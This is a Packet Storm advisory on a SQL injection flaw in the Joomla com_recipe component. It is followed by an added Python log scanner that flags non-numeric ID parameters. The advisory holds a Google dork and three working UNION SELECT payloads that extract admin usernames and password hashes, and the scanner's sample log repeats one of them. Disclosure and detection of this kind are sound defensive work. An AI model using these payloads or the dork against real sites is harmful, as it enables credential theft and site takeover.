Joomla Recipe SQL Injection

2010-02-20T00:00:00
ID PACKETSTORM:86483
Type packetstorm
Reporter Fl0riX
Modified 2010-02-20T00:00:00

Description

                                        
                                            `  
########################################################################
#
# Joomla Component com_recipe SQL Injection Vulnerabilities
#
########################################################################
#
# Author : FL0RiX
#
# Greetz: All Tahkikat-ul Ahlak Family
#
# Name : com_recipe
#
# Google Dork: allinurl:"com_recipe"
#
# Bug Type : SQL Injection
#
# Infection : Admin login credentials can be obtained.
#
# Demo Vulns :
#
# site.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]
# site.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]
# site.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3]
#
# EXPLOIT1 : +and+1=0+union+select+concat(username,0x3a,password)+from+jos_users--
# EXPLOIT2 : +and+1=0+union+select+1,concat(username,0x3a,password),3,4+from+jos_users--
# EXPLOIT3 : +and+1=0+union+select+user(),concat(username,0x3a,password),user(),user()+from+jos_users--
#
#############################################################################
  
  
  
  
  
`
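
Added example (not part of the original advisory or of the component's code): a Python check a defender can run over web server access logs to flag com_recipe requests whose ID parameters (rec, id, type, category, Itemid, which carry integers in the demo URLs above) contain anything other than digits. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters that carry integer IDs in the advisory's com_recipe demo URLs.
NUMERIC_PARAMS = ("rec", "id", "type", "category", "Itemid")

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return {param: decoded value} for com_recipe ID parameters that are not integers."""
    query = parse_qs(urlsplit(url).query)  # decodes '+' and %XX escapes
    if "com_recipe" not in query.get("option", []):
        return {}
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"[0-9]+", value):
                bad[name] = value
    return bad


def scan(lines):
    """Yield (line_number, client_ip, bad_params) for every flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_params(match.group(1))
        if bad:
            yield number, line.split(" ", 1)[0], bad


# Constructed sample log lines (documentation IP ranges, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2010:10:00:01 +0000] "GET /index.php?option=com_recipe&view=recipe&layout=defaults&rec=73 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Feb/2010:10:00:05 +0000] "GET /index.php?option=com_recipe&view=recipe&layout=defaults&rec=73+and+1=0+union+select+concat(username,0x3a,password)+from+jos_users-- HTTP/1.1" 200 812',
    '192.0.2.11 - - [20/Feb/2010:10:00:09 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 100',
    '198.51.100.7 - - [20/Feb/2010:10:00:12 +0000] "GET /index.php?option=com_recipe&task=view&Itemid=16&id=4%20and%201=0 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, client, bad in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-numeric {bad}")
```

The same integer-only rule, applied to these parameters before they reach the query (for example by casting them to integers in the component or enforcing the pattern at a WAF), closes the injection point rather than only detecting its use.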